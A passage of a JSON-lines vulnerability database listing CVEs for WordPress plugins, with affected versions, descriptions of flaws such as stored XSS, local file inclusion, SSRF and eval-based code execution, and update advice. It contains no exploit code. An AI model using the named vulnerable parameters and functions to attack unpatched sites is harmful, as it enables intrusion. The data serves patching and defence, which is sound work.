version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/xwp\\\/stream\\\/blob\\\/develop\\\/changelog.md#410---january-15-2025\",\"name\":\"https:\\\/\\\/github.com\\\/xwp\\\/stream\\\/blob\\\/develop\\\/changelog.md#410---january-15-2025\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226637%40stream&new=3226637%40stream&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226637%40stream&new=3226637%40stream&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8680ad0a-7513-408d-a62d-ffb0b0e7addb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8680ad0a-7513-408d-a62d-ffb0b0e7addb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5089","slug":"defender-security","versionImpact":"4.0.2","versionEndExcluding":"4.1.0","description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.","recommendation":"Update to version 4.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.sprocketsecurity.com\\\/resources\\\/discovering-wp-admin-urls-in-wordpress-with-gravityforms\",\"name\":\"https:\\\/\\\/www.sprocketsecurity.com\\\/resources\\\/discovering-wp-admin-urls-in-wordpress-with-gravityforms\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b547488-187b-44bc-a57d-f876a7d4c87d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b547488-187b-44bc-a57d-f876a7d4c87d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5758","slug":"ultimate-post","versionImpact":"4.0.4","versionEndExcluding":"4.1.0","description":"The Post Grid Gutenberg Blocks and WordPress Blog Plugin \u2013 PostX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the filterMobileText parameter in all versions up to, and including, 4.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dcc3f47-8504-4aa6-af60-03edeaa39fd7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dcc3f47-8504-4aa6-af60-03edeaa39fd7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2024-4305\\\/\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2024-4305\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/635be98d-4c17-4e75-871f-9794d85a2eb1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/635be98d-4c17-4e75-871f-9794d85a2eb1\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3088956%40ultimate-post%2Ftrunk&old=3076390%40ultimate-post%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3088956%40ultimate-post%2Ftrunk&old=3076390%40ultimate-post%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6694","slug":"wp-mail-smtp","versionImpact":"4.0.1","versionEndExcluding":"4.1.0","description":"The WP Mail SMTP plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 4.0.1. This is due to plugin providing the SMTP password in the SMTP Password field when viewing the settings. This makes it possible for authenticated attackers, with administrative-level access and above, to view the SMTP password for the supplied server. Although this would not be useful for attackers in most cases, if an administrator account becomes compromised this could be useful information to an attacker in a limited environment.","recommendation":"Update to version 4.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d4e9daf-d414-4ace-9efd-4c3e16deeb8f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d4e9daf-d414-4ace-9efd-4c3e16deeb8f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120454\\\/wp-mail-smtp\\\/trunk\\\/src\\\/Providers\\\/OptionsAbstract.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120454\\\/wp-mail-smtp\\\/trunk\\\/src\\\/Providers\\\/OptionsAbstract.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12104","slug":"atarim-visual-collaboration","versionImpact":"4.0.9","versionEndExcluding":"4.1.0","description":"The Visual Website Collaboration, Feedback & Project Management \u2013 Atarim plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the wpf_delete_file and wpf_delete_file functions in all versions up to, and including, 4.0.9. This makes it possible for unauthenticated attackers to delete project pages and files.","recommendation":"Update to version 4.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3225314%40atarim-visual-collaboration&new=3225314%40atarim-visual-collaboration&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3225314%40atarim-visual-collaboration&new=3225314%40atarim-visual-collaboration&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d40c658-a156-470e-bf93-a1f2ccec9c61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d40c658-a156-470e-bf93-a1f2ccec9c61?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12499","slug":"wp-jquery-datatable","versionImpact":"4.0.1","versionEndExcluding":"4.1.0","description":"The WP jQuery DataTable plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_jdt' shortcode in all versions up to, and including, 4.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213340%40wp-jquery-datatable&new=3213340%40wp-jquery-datatable&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213340%40wp-jquery-datatable&new=3213340%40wp-jquery-datatable&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c6a6422-8255-4a3c-9ddf-b5986e1d393f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c6a6422-8255-4a3c-9ddf-b5986e1d393f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47177","slug":"wp-easy-pay","versionEndExcluding":"4.1","description":"Cross-Site Request Forgery (CSRF) vulnerability in WP Easy Pay WP EasyPay \u2013 Square for WordPress plugin <=\u00a04.1 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-easy-pay\\\/wordpress-wp-easypay-square-for-wordpress-plugin-4-0-4-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-easy-pay\\\/wordpress-wp-easypay-square-for-wordpress-plugin-4-0-4-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13863","slug":"stylish-google-sheet-reader","versionImpact":"4.0","versionEndExcluding":"4.1","description":"The Stylish Google Sheet Reader 4.0  WordPress plugin before 4.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6161595-0934-4baa-9da6-73792f4b87fd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6161595-0934-4baa-9da6-73792f4b87fd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1465","slug":"wp-easy-pay","versionEndExcluding":"4.1","description":"The WP EasyPay WordPress plugin before 4.1 does not escape some generated URLs before outputting them back in pages, leading to Reflected Cross-Site Scripting issues which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13f59eb4-0744-4fdb-94b5-886ee6bdd867\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13f59eb4-0744-4fdb-94b5-886ee6bdd867\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6441","slug":"webinar-ignition","versionImpact":"4.03.32","versionEndExcluding":"4.03.33","description":"The Webinar Solution: Create live\/evergreen\/automated\/instant webinars, stream & Zoom Meetings | WebinarIgnition plugin for WordPress is vulnerable to unauthenticated login token generation due to a missing capability check on the `webinarignition_sign_in_support_staff` and `webinarignition_register_support` functions in all versions up to, and including, 4.03.31. This makes it possible for unauthenticated attackers to generate login tokens for arbitrary WordPress users under certain circumstances, issuing authorization cookies which can lead to authentication bypass.","recommendation":"Update to version 4.03.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webinar-ignition\\\/trunk\\\/inc\\\/class.WebinarignitionAjax.php#L769\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webinar-ignition\\\/trunk\\\/inc\\\/class.WebinarignitionAjax.php#L769\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webinar-ignition\\\/trunk\\\/inc\\\/class.WebinarignitionManager.php#L1040\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webinar-ignition\\\/trunk\\\/inc\\\/class.WebinarignitionManager.php#L1040\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webinar-ignition\\\/trunk\\\/inc\\\/class.WebinarignitionManager.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webinar-ignition\\\/trunk\\\/inc\\\/class.WebinarignitionManager.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webinar-ignition\\\/trunk\\\/inc\\\/class-webinarignition.php#L549\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webinar-ignition\\\/trunk\\\/inc\\\/class-webinarignition.php#L549\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52c19707-df18-4239-af46-12ea5ee86a4b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52c19707-df18-4239-af46-12ea5ee86a4b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7149","slug":"wp-event-solution","versionImpact":"4.0.8","versionEndExcluding":"4.0.9","description":"The Event Manager, Events Calendar, Tickets, Registrations \u2013 Eventin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.0.8 via multiple style parameters. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 4.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75537b61-5622-4b35-b80e-389526bd99f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75537b61-5622-4b35-b80e-389526bd99f0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/speakers\\\/speakers.php#L483\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/speakers\\\/speakers.php#L483\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/events\\\/events.php#L754\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/events\\\/events.php#L754\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/schedule\\\/schedule.php#L368\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/schedule\\\/schedule.php#L368\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/schedule-list\\\/schedule-list.php#L293\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/schedule-list\\\/schedule-list.php#L293\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/events-tab\\\/style\\\/tab-1.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/events-tab\\\/style\\\/tab-1.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157415\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157415\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6138","slug":"secure-copy-content-protection","versionImpact":"4.0.8","versionEndExcluding":"4.0.9","description":"The Secure Copy Content Protection and Content Locking WordPress plugin before 4.0.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ef2a8d8-39d5-45d3-95de-e7bac4b7382d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ef2a8d8-39d5-45d3-95de-e7bac4b7382d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0974","slug":"social-media-widget","versionImpact":"4.0.8","versionEndExcluding":"4.0.9","description":"The Social Media Widget WordPress plugin before 4.0.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 4.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f8e5e63-a928-443e-9771-8b3f51f5eb9e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f8e5e63-a928-443e-9771-8b3f51f5eb9e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4150","slug":"user-activity-tracking-and-log","versionEndExcluding":"4.0.9","description":"The User Activity Tracking and Log WordPress plugin before 4.0.9 does not have proper CSRF checks when managing its license, which could allow attackers to make logged in admins update and deactivate the plugin's license via CSRF attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/381ef15b-aafe-4ef4-a0bc-867d891f7f44\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/381ef15b-aafe-4ef4-a0bc-867d891f7f44\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8672","slug":"widget-options","versionImpact":"4.0.7","versionEndExcluding":"4.0.8","description":"The Widget Options \u2013 The #1 WordPress Widget & Block Control Plugin plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.0.7 via the display logic functionality that extends several page builders. This is due to the plugin allowing users to supply input that will be passed through eval() without any filtering or capability checks. This makes it possible for authenticated attackers, with contributor-level access and above, to execute code on the server. Special note: We suggested the vendor implement an allowlist of functions and limit the ability to execute commands to just administrators, however, they did not take our advice. We are considering this patched, however, we believe it could still be further hardened and there may be residual risk with how the issue is currently patched.","recommendation":"Update to version 4.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-options\\\/trunk\\\/includes\\\/pagebuilders\\\/beaver\\\/beaver.php#L825\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-options\\\/trunk\\\/includes\\\/pagebuilders\\\/beaver\\\/beaver.php#L825\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-options\\\/trunk\\\/includes\\\/pagebuilders\\\/elementor\\\/render.php#L379\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-options\\\/trunk\\\/includes\\\/pagebuilders\\\/elementor\\\/render.php#L379\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-options\\\/trunk\\\/includes\\\/widgets\\\/gutenberg\\\/gutenberg-toolbar.php#L718\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-options\\\/trunk\\\/includes\\\/widgets\\\/gutenberg\\\/gutenberg-toolbar.php#L718\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3192921%40widget-options&new=3192921%40widget-options&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3192921%40widget-options&new=3192921%40widget-options&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d03af4d-a1f9-4c15-a62e-f4cdbcfc9af7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d03af4d-a1f9-4c15-a62e-f4cdbcfc9af7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0467","slug":"wp-dark-mode","versionEndExcluding":"4.0.8","description":"The WP Dark Mode WordPress plugin before 4.0.8 does not properly sanitize the style parameter in shortcodes before using it to load a PHP template. This leads to Local File Inclusion on servers where non-existent directories may be traversed, or when chained with another vulnerability allowing arbitrary directory creation.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8eb431a6-59a5-4cee-84e0-156c0b31cfc4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8eb431a6-59a5-4cee-84e0-156c0b31cfc4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12024","slug":"eventprime-event-calendar-management","versionImpact":"4.0.7.3","versionEndExcluding":"4.0.7.4","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the em_ticket_category_data and em_ticket_individual_data parameters in all versions up to, and including, 4.0.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrative user accesses an injected page.\r\nNote: this vulnerability requires the \"Guest Submissions\" setting to be enabled. It is disabled by default.","recommendation":"Update to version 4.0.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/admin\\\/partials\\\/metaboxes\\\/meta-box-tickets-panel-html.php#L216\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/admin\\\/partials\\\/metaboxes\\\/meta-box-tickets-panel-html.php#L216\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/admin\\\/partials\\\/metaboxes\\\/meta-box-tickets-panel-html.php#L264\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/admin\\\/partials\\\/metaboxes\\\/meta-box-tickets-panel-html.php#L264\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/includes\\\/class-ep-ajax.php#L1245\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/includes\\\/class-ep-ajax.php#L1245\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/includes\\\/class-ep-ajax.php#L971\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/includes\\\/class-ep-ajax.php#L971\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/includes\\\/class-eventprime-sanitizer.php#L122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/includes\\\/class-eventprime-sanitizer.php#L122\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e51c8b5-cbb9-48aa-9c99-69f1b39fb0b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e51c8b5-cbb9-48aa-9c99-69f1b39fb0b4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13526","slug":"eventprime-event-calendar-management","versionImpact":"4.0.7.3","versionEndExcluding":"4.0.7.4","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability checks on the export_submittion_attendees function in all versions up to, and including, 4.0.7.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to download list of attendees for any event.","recommendation":"Update to version 4.0.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.7.3\\\/includes\\\/class-ep-ajax.php#L1903\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.7.3\\\/includes\\\/class-ep-ajax.php#L1903\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2be578d9-27c3-4a16-a634-1514ed97a1a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2be578d9-27c3-4a16-a634-1514ed97a1a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10705","slug":"multiple-pages-generator-by-porthas","versionImpact":"4.0.5","versionEndExcluding":"4.0.6","description":"The Multiple Page Generator Plugin \u2013 MPG plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.0.5 via the 'mpg_download_file_by_link' function. This makes it possible for authenticated attackers, with editor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 4.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205550\\\/multiple-pages-generator-by-porthas\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205550\\\/multiple-pages-generator-by-porthas\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b3446e5-ca01-4468-927a-86e951e662ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b3446e5-ca01-4468-927a-86e951e662ab?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10681","slug":"armember-membership","versionImpact":"4.0.51","versionEndExcluding":"4.0.52","description":"The The ARMember \u2013 Membership Plugin, Content Restriction, Member Levels, User Profile & User signup plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 4.0.51. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"Update to version 4.0.52, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199747\\\/armember-membership\\\/trunk\\\/core\\\/classes\\\/class.arm_shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199747\\\/armember-membership\\\/trunk\\\/core\\\/classes\\\/class.arm_shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee0eead2-3eab-4a2a-bfe4-c0d8f91dc0a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee0eead2-3eab-4a2a-bfe4-c0d8f91dc0a5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1063","slug":"classified-listing","versionImpact":"4.0.4","versionEndExcluding":"4.0.5","description":"The Classified Listing \u2013 Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.0.4 via the rtcl_taxonomy_settings_export function. This makes it possible for unauthenticated attackers to extract sensitive data including API keys and tokens.","recommendation":"Update to version 4.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3241883\\\/classified-listing\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3241883\\\/classified-listing\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e701b771-59f2-4783-b0a1-bea4d6c3d245?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e701b771-59f2-4783-b0a1-bea4d6c3d245?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
